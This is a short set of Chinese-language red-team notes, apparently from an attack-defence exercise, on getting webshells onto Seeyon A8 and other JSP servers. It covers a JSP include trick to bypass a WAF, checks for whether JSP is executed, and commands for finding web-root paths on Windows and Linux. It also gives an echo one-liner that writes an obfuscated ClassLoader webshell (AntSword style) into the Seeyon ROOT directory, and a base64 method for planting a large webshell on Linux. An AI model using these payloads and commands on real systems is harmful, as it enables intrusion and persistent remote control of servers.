小护网期间遇到的几个点的技巧

1. jsp本地包含文件:   可能需要利用包含过waf，
 

<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
<%@include file="abc.js"%>

2.  测试是否支持解析jsp，显示源代码说明不解析，显示hello world说明解析

<% out.println("hello world"); %>  

3.  解析路径可参考  

D:\Seeyon\A8\ApacheJetspeed\webapps\Seeyon\shiro9000.jsp  不解析

要这个目录才解析   D:\Seeyon\A8\ApacheJetspeed\webapps\ROOT\shiro9000.jsp

4.  windows下查找文件命令:  

当注入或者其他获取到cmd，但是目标不出网的时候，站库不分离

where /R  D:\wwwroot\   /T  t_2810039303.jpg 

建议用它：
dir /s /b D:\*.js | findstr /i /e "dojo.js"

找到网站的物理路径   echo webshell   蚂剑一句话zero

echo ^<%!class SBDZ extends ClassLoader{ SBDZ(ClassLoader ZQIM){ super(ZQIM); }public Class g(byte []b){ return super.defineClass(b,0,b.length); }}%^>^<% String cls=request.getParameter("zero");if(cls!=null){ new SBDZ(this.\u0067etClass().\u0067etClassLoader()).g(new sun.misc.\u0042\u0041\u0053\u0045\u00364\u0044\u0065co\u0064\u0065\u0072().decodeBuffer(cls)).newInstance().equals(pageContext); }%^>  >> D:\Seeyon\A8\ApacheJetspeed\webapps\ROOT\shiro9000.jsp

5.  linux下查找文件命令:  

ls -m  会以分号隔开列出文件（find找不到的shell找网站路径有用 ）
find /  -type f -name "*.jsp"  查找主站特定文件名。
find /  -type f -name "*.jsp" | xargs grep "ERROR"    查找主站特定文件名内容。

找到网站的物理路径   echo webshell    

base64 可以是大马，多次echo就行

echo base64马内容 | base64 -d >> /app/yyadm/heihao.jsp

好像都是些常规路子